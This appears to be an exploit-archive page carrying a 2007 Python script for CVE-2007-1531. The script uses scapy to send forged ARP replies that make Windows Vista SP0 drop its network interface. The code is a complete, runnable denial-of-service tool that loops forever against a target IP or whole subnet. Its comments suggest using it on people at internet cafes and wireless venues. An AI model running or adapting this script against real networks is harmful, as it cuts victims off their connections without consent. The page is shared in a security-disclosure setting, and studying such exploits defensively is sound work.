exploit the possibilities

arp-dos.txt

arp-dos.txt
Posted May 16, 2007
Authored by Kristian Hermansen

Microsoft Windows Vista forged ARP packet network stack denial of service exploit.

tags | exploit, denial of service
systems | windows, vista
advisories | CVE-2007-1531
MD5 | ab48c028aa04f2202ca832d3800f7082

arp-dos.txt

Change Mirror Download
#!/usr/bin/env python
#
# :: Kristian Hermansen ::
# Date: 20070514
# Reference: CVE-2007-1531
# Description: Microsoft Windows Vista (SP0) dumps interfaces when
# it receives this ARP packet. This DoS is useful for an internet
# cafe, wireless venue, or legitimate local attack. The victim will
# need to manually refresh their network interface. OK, sure
# it's a dumb local attack, but why does Vista disable iface!?!??
# -> Thanks to Newsham / Hoagland
# Vulnerable: Microsoft Windows Vista (SP0) [All Versions]
# Tested:
# * victim == Windows Vista Enterprise (SP0) [English]
# * attacker == Ubuntu Feisty (7.04)
# Usage: python fISTArp.py <victim>
# Depends: scapy.py
# [?] If you don't have scapy
# [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py

from sys import argv
from os import geteuid
from scapy import Ether,ARP,send,srp,conf
from time import sleep

conf.verb = 0

def head():
print """
__ ___ ____ _____ _
/ _|_ _/ ___|_ _|/ \ _ __ _ __
| |_ | |\___ \ | | / _ \ | '__| '_ \
| _|| | ___) || |/ ___ \| | | |_) |
|_| |___|____/ |_/_/ \_\_| | .__/
|_|

"""

def isroot():
if geteuid() != 0:
print "TRY AGAIN AS ROOT SILLY..."
return False
else:
return True

def usage():
print "usage:", argv[0], "<victim(s)>"
print "examples:", argv[0], "192.168.1.100"
print "examples:", argv[0], "192.168.1.0/24\n"

def fisting():
arp_fist = ARP(pdst=argv[1],op=2)
print "We are going to loop forever, CTRL-C to stop...\n"
while True:
sleep(3)
for a in arp_fist:
arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
ans,unans = srp(arping,timeout=0.1)
if len(ans) == 1:
a.psrc=a.pdst
print a.pdst, "is ALIVE!"
print "* Time to shut it down!"
send(a)
ans2,unans2 = srp(arping,timeout=0.1)
if len(unans2) == 1:
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print "@@@", a.psrc, "was rubber fisted!"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
sleep(3)
else:
print "FAILED:", a.pdst, "is still alive :-("
else:
print a.pdst, "is already DEAD!"
print

head()
if isroot() != True:
exit(1)
if len(argv) != 2:
usage()
exit(1)
else:
fisting()

# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    4 Files
  • 13
    Jul 13th
    14 Files
  • 14
    Jul 14th
    19 Files
  • 15
    Jul 15th
    11 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close